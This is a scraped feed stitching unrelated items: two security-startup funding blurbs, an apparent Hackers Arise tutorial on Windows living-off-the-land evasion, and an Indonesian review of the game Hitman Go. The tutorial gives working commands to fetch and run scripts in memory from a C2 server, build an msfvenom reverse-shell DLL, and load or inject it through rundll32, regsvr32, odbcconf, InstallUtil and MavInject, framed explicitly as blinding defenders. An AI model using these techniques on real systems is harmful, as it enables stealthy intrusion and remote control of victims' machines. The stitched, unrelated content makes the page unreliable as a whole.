The startupβs solution captures, verifies, and governs all AI interactions within an enterpriseβs environment.
The post AI Security Firm Ciphero Emerges From Stealth With $2.5 Million in Funding appeared first on SecurityWeek.
The startup takes an agentic approach to preventing vulnerability exploitation by uncovering exposure across assets.
The post Dux Emerges From Stealth Mode With $9 Million in Funding appeared first on SecurityWeek.
Welcome back, cyberwarriors!Β
We hope that throughout the Survival series, you have been learning a lot from us. Today, we introduce Living off the Land techniques that can be abused without triggering alarms. Our goal is to use knowledge from previous articles to get our job done without unnecessary attention from defenders. All the commands we cover in two parts are benign, native, and also available on legacy systems. Not all are well-known, and tracking them all is impossible as they generate tons of logs that are hard to dig through. As you may know, some legitimate software may act suspiciously with its process and driver names. Tons of false positives quickly drain defenders, so in many environments, you can fly under the radar with these commands.Β
Today, youβll learn how to execute different kinds of scripts as substitutes for .ps1 scripts since they can be monitored, create fake drivers, and inject DLLs into processes to get a reverse shell to your C2.
Letβs get started!
Letβs recall the basic concepts of stealth in PowerShell from earlier articles. PowerShell is a built-in scripting environment used by system administrators to automate tasks, check system status, and configure Windows. Itβs legitimate and not suspicious unless executed where it shouldnβt be. Process creation can be monitored, but this isnβt always the case. It requires effort and software to facilitate such monitoring. The same applies to .ps1 scripts. This is why we learned how to convert .ps1 to .bat to blend in in one of the previous articles. It doesnβt mean you should avoid PowerShell or its scripts, as you can create a great variety of tools with it.Β
Hereβs a reminder of how to download and execute a script in memory with stealth:
PS > powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"
Walkthrough: This tells PowerShell to start quickly without loading user profile scripts (-nop), hide the window (-w h), ignore script execution rules (-ep bypass), download a script from a URL, and run it directly in memory (DownloadString + Invoke-Expression).
When you would use it: When you need to fetch a script from a remote server and run it quietly.
Why itβs stealthy: PowerShell is common for admin tasks, and in-memory execution leaves no file on disk for antivirus to scan. Skipping user profile scripts avoids potential monitoring embedded in them.
A less stealthy option would be:
PS > iwr http://c2/script.ps1 | iexΒ
Itβs important to keep in mind that Invoke-WebRequest (iwr) and Invoke-Expression (iex) are often abused by hackers. Later, weβll cover stealthier ways to download and execute payloads.
CMD is the classic Windows command prompt used to run batch files and utilities. Although this module focuses on PowerShell, stealth is our main concern, so we cover some CMD commands. With its help, we can chain utilities, redirect outputs to files, and collect system information quietly.
Hereβs how to chain enumeration with CMD:
PS > cmd.exe /c "whoami /all > C:\Temp\privs.txt & netstat -ano >> C:\Temp\privs.txt"
Walkthrough: /c runs the command and exits. whoami /all gets user and privilege info and writes it to C:\Temp\privs.txt. netstat -ano appends active network connections to the same file. The user doesnβt see a visible window.
When you would use it: Chaining commands is handy, especially if Script Block Logging is in place and your commands get saved.
Why itβs stealthy: cmd.exe is used everywhere, and writing to temp files looks like routine diagnostics.
This runs VBScript or JScript scripts from the command line. Older automation relies on it to execute scripts that perform checks or launch commands. Mainly we will use it to bypass ps1 execution monitoring. Below, you can see how we executed a JavaScript script.
PS > cscript //E:JScript //Nologo C:\Temp\script.js
Walkthrough (plain): //E:JScript selects the JavaScript engine, while //Nologo hides the usual header. The final argument points to the script that will be run.
When you would use it: All kinds of use. With the help of AI you can write an enumeration script.
Why itβs stealthy: Itβs less watched than PowerShell in some environments and looks like legacy automation.
By default, it runs Windows Script Host (WSH) scripts (VBScript/JScript), often for scripts showing dialogs. As a pentester, you can run a VBScript in the background or perform shell operations without visible windows.
PS > wscript.exe //E:VBScript C:\Temp\enum.vbs //B
Walkthrough: //B runs in batch mode (no message boxes). The VBScript at C:\Temp\enum.vbs is executed by the Windows Script Host.
When you would use it: Same thing here, it really depends on the script you create. We made a system enumeration script that sends output to a text file.Β
Why itβs stealthy: Runs without windows and is often used legitimately.
Normally, it runs HTML Applications (HTA) containing scripts, used for small admin UIs. For pentesters, itβs a way to execute HTA scripts with embedded code. It requires a graphical interface.
PS > mshta users.htaΒ
Walkthrough: mshta.exe runs script code in users.hta, which could create a WScript object and execute commands, potentially opening a window with output.
When you would use it: To run a seemingly harmless HTML application that executes shell commands
Why itβs stealthy: It looks like a web or UI component and can bypass some script-only rules.
These techniques rely on legitimate DLL loading or registration mechanics to get code running.
Used to load a DLL and call its exported functions, often by installers and system utilities. Pentesters can use it to execute a script or function in a DLL, like a reverse shell generated by msfvenom. Be cautious, as rundll32.exe is frequently abused.
C:\> rundll32.exe C:\reflective_dll.x64.dll,TestEntry
Walkthrough: The command runs rundll32.exe to load reflective_dll.x64.dll and call its TestEntry function.
When you would use it: To execute a DLLβs code in environments where direct execution is restricted.
Why itβs stealthy: rundll32.exe is a common system binary and its activity can blend into normal installer steps.
In plain terms it adds or removes special Windows files (like DLLs or scriptlets) from the systemβs registry so that applications can use or stop using them. It is another less frequently used way to execute DLLs.
PS > regsvr32.exe /u /s .\reflective_dll.x64.dll
Walkthrough: regsvr32 is asked to run the DLL. /s makes it silent.Β
When you would use it: To execute a DLL via a registration process, mimicking maintenance tasks.
Why itβs stealthy: Registration operations are normal in IT workflows, so the call can be overlooked.
Normally, odbcconf.exe helps programs connect to databases by setting up drivers and connections. You can abuse it to run your DLLs. Below is an example of how we executed a generated DLL and got a reverse shell
bash > msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.57 LPORT=4444 -f dll -o file.dll
PS > odbcconf.exe INSTALLDRIVER βPrinter-driverX|Driver=C:\file.dll|APILevel=2β
PS > odbcconf.exe configsysdns βPrinter-driverXβ βDNS=Printer-driverXβ
Walkthrough: The first odbcconf command tells Windows to register a fake database driver named βPrinter-driverXβ using a DLL file. The APILevel=2 part makes it look like a legitimate driver. When Windows processes this, it loads file.dll, which runs a reverse shell inside of it. The second odbcconf command, creates a system data source (DSN) named βPrinter-driverXβ tied to that fake driver, which triggers the DLL to load again, ensuring the malicious code runs.
When you would use it: To execute a custom DLL stealthily, especially when other methods are monitored.
Why itβs stealthy: odbcconf is a legit Windows tool rarely used outside database admin tasks, so itβs not heavily monitored by security tools or admins on most systems. Using it to load a DLL looks like normal database setup activity, hiding the malicious intent.
Normally, it is a Windows tool that installs or uninstalls .NET programs, like DLLs or executables, designed to run as services or components. It sets them up so they can work with Windows, like registering them to start automatically, or removes them when theyβre no longer needed. In pentest scenarios, the command is used to execute malicious code hidden in a specially crafted .NET DLL by pretending to uninstall it as a .NET service.
PS > InstallUtil.exe /logfile= /LogToConsole=false /U file.dll
Walkthrough: The command tells Windows to uninstall a .NET assembly (file.dll) that was previously set up as a service or component. The /U flag means uninstall, /logfile= skips creating a log file, and /LogToConsole=false hides any output on the screen. If file.dll is a malicious .NET assembly with a custom installer class, uninstalling it can trigger its code, like a reverse shell when the command processes the uninstall. However, for a DLL from msfvenom, this may not work as intended unless itβs specifically a .NET service DLL.
When you would use it:. Itβs useful when you have admin access and need to execute a .NET payload stealthily, especially if other methods are unavailable.
Why itβs stealthy: Install utilities are commonly used by developers and administrators.
Essentially, it was designed to help with Application Virtualization, when Windows executes apps in a virtual container. We use it to inject DLLs into running processes to get our code executed. We recommend using system processes for injections, such as svchost.exe.Here is how itβs done:
PS > MavInject.exe 528 /INJECTRUNNING C:\file.dll
Walkthrough: Targets process ID 528 (svchost.exe) and instructs MavInject.exe to inject file.dll into it. When the DLL loads, it runs the code and we get a connection back.
Why you would use it: To inject a DLL for a high-privilege reverse shell, like SYSTEM access.Β
Why itβs stealthy: MavInject.exe is a niche Microsoft tool, so itβs rarely monitored by security software or admins, making the injection look like legitimate system behavior.
Living off the Land techniques matter a lot in Windows penetration testing, as they let you achieve your objectives using only built-in Microsoft tools and signed binaries. That reduces forensic footprints and makes your activity blend with normal admin behavior, which increases the chance of bypassing endpoint protections and detection rules. In Part 1 we covered script execution and DLL injections, some of which will significantly improve your stealth and capabilities. In Part 2, you will explore network recon, persistence, and file management to further evade detection. Defenders can also learn a lot from this to shape the detection strategies. But as it was mentioned earlier, monitoring system binaries might generate a lot of false positives.Β
Resources:
https://lofl-project.github.io
https://lolbas-project.github.io/#
The post PowerShell for Hackers β Survival Edition, Part 4: Blinding Defenders first appeared on Hackers Arise.
Berbicara tentang seri game Hitman, yang terlintas pertama kali biasanya adalah aksi sembunyi-sembunyi penuh ketegangan, eksekusi target dengan berbagai cara kreatif, hingga petualangan penuh tantangan ala Agent 47. Namun, pada tahun 2014, Square Enix Montreal mencoba pendekatan baru yang unik dan mengejutkan para penggemar dengan merilis Hitman Go, sebuah spin-off yang mengubah formula aksi intens menjadi permainan strategi ala board game yang elegan dan penuh teka-teki.
Hitman Go bukan sekadar eksperimen kecil, melainkan transformasi besar dalam memahami kembali franchise Hitman. Game ini berhasil memadukan konsep stealth, strategi, dan puzzle-solving dalam sebuah paket minimalis namun sangat adiktif. Dirancang untuk platform mobile awalnya, Hitman Go juga hadir di berbagai platform lain seperti PC, konsol, hingga perangkat VR. Dengan gaya visualnya yang unik serta mekanisme gameplay yang simpel namun menantang, Hitman Go sukses menghadirkan pengalaman yang benar-benar segar bagi para pemain.
Hal pertama yang mencuri perhatian dari Hitman Go adalah gaya visualnya yang sangat berbeda dibandingkan seri utama Hitman. Alih-alih dunia 3D yang realistis dan detail, Hitman Go hadir dengan estetika papan permainan yang minimalis dan elegan. Setiap level ditampilkan sebagai diorama papan permainan dengan berbagai miniatur figur yang mewakili karakter utama, musuh, serta elemen-elemen lingkungan.
Desainnya dibuat dengan penuh perhatian terhadap detail, seperti meja kayu, potongan karakter yang tampak seperti figur plastik, hingga latar belakang papan permainan yang terlihat seperti ruangan dengan pencahayaan yang lembut. Gaya visual ini menciptakan suasana yang tenang dan santai, sekaligus memberikan kesan eksklusif yang jarang ditemukan dalam game berbasis strategi lainnya.
Warna-warna yang digunakan dalam Hitman Go juga sangat efektif dalam menyampaikan pesan serta tujuan permainan, di mana pemain bisa dengan mudah mengenali berbagai elemen penting dalam game, mulai dari posisi musuh, lokasi tujuan, hingga berbagai rintangan lainnya. Tampilan sederhana namun penuh gaya ini menjadi salah satu daya tarik utama yang membuat Hitman Go berhasil menarik perhatian banyak gamer yang biasanya tidak tertarik pada genre strategi.
Walaupun hadir dalam bentuk sederhana, gameplay Hitman Go sama sekali tidak boleh dianggap remeh. Game ini dirancang dengan tingkat kesulitan yang meningkat secara bertahap, membuat pemain harus berpikir keras dalam menyelesaikan setiap level. Pemain mengontrol figur Agent 47 di atas papan permainan, di mana setiap gerakan dibuat dalam bentuk langkah-langkah sederhana, layaknya pion dalam catur.
Setiap level terdiri dari berbagai jalur yang sudah ditentukan, lengkap dengan penjaga yang bergerak secara otomatis mengikuti pola tertentu. Tugas pemain adalah mencari cara terbaik untuk mencapai target atau tujuan akhir tanpa tertangkap musuh. Meski tampak sederhana, mekanik puzzle dalam Hitman Go sangat menantang dan membutuhkan perencanakan matang sebelum pemain bergerak.
Tiap level biasanya memiliki beberapa tujuan tambahan seperti menyelesaikan level dalam jumlah langkah tertentu, tidak membunuh musuh, atau mengambil barang tersembunyi. Tantangan tambahan ini memberikan nilai replayability tinggi, karena pemain akan terus tergoda untuk mengulang level demi mendapatkan skor sempurna.
Hitman Go bukan hanya sekadar puzzle biasa yang menggunakan nama Hitman demi menarik perhatian, melainkan adaptasi cerdas yang mempertahankan esensi franchise Hitman secara utuh. Elemen stealth dan strategi yang menjadi inti seri Hitman tetap hadir secara kuat dalam Hitman Go. Pemain masih harus berpikir hati-hati sebelum bertindak, merencanakan setiap langkah dengan presisi tinggi, serta memanfaatkan berbagai trik dan strategi untuk mengecoh musuh.
Berbagai elemen khas Hitman seperti penyamaran, melempar benda untuk mengalihkan perhatian, hingga eksekusi target dengan berbagai cara kreatif tetap tersedia dalam bentuk yang lebih minimalis namun efektif. Hal ini membuat penggemar lama seri Hitman tetap merasakan kesan familiar, sambil juga memperkenalkan aspek-aspek baru yang menarik dan berbeda.
Bagi pemain baru yang belum pernah mengenal Hitman sebelumnya, Hitman Go juga berfungsi sebagai pengenalan sempurna terhadap inti gameplay franchise ini, yaitu perencanaan strategis serta pendekatan stealth yang cerdas.
Selain aspek visual dan gameplay, Hitman Go juga menawarkan kualitas audio yang sangat baik. Musik latar yang digunakan dalam game ini sengaja dibuat minimalis, dengan nada-nada yang lembut namun menegangkan, mampu memperkuat atmosfer permainan yang penuh dengan strategi dan teka-teki.
Efek suara seperti langkah kaki, bunyi alarm, hingga suara ketika figur karakter bergerak dan berinteraksi dengan objek di papan permainan dibuat sangat jelas dan tajam, menambah rasa imersi dalam permainan. Bahkan tanpa adanya dialog atau narasi lisan, Hitman Go berhasil menyampaikan cerita serta situasi di setiap level dengan efektif hanya melalui kombinasi visual dan audio yang brilian.
Awalnya dirancang untuk perangkat mobile, Hitman Go memang sangat nyaman dimainkan di berbagai situasi. Desain gameplay yang berbasis giliran memungkinkan pemain untuk memainkannya dalam sesi singkat maupun lama. Ini menjadikannya pilihan ideal bagi mereka yang ingin menikmati permainan berkualitas tinggi dalam waktu terbatas, seperti saat bepergian atau sekadar mengisi waktu luang.
Ketika Hitman Go akhirnya hadir di PC dan konsol, gameplay yang sederhana namun mendalam ini tetap terasa nyaman dimainkan, berkat desain kontrol yang intuitif dan responsif. Bahkan, versi VR-nya menambah dimensi baru yang membuat pengalaman bermain semakin unik dan mengesankan.
Hitman Go adalah bukti nyata bahwa franchise populer pun bisa sukses ketika diadaptasi ke dalam genre yang sama sekali berbeda, selama eksekusinya dilakukan dengan cerdas dan kreatif. Melalui desain visual minimalis yang elegan, gameplay puzzle-strategi yang menantang otak, hingga audio yang mengesankan, Hitman Go berhasil memberikan pengalaman yang unik dan menyenangkan bagi penggemar seri Hitman maupun pemain baru.
Bagi para gamer yang menginginkan tantangan berbeda atau sekadar mencari game ringan namun tetap menguji kecerdasan dan kreativitas, Hitman Go jelas menjadi pilihan yang sangat direkomendasikan. Sebuah spin-off yang tidak hanya layak dimainkan, tetapi juga menjadi contoh bagaimana sebuah inovasi dalam dunia game bisa dilakukan dengan sangat baik.
The post Hitman Go: Saat Game Aksi Mematikan Berubah Menjadi Strategi Papan yang Elegan! appeared first on Informasi Untukmu Seputar Game PC, Mobile Sampai Konsol.
Login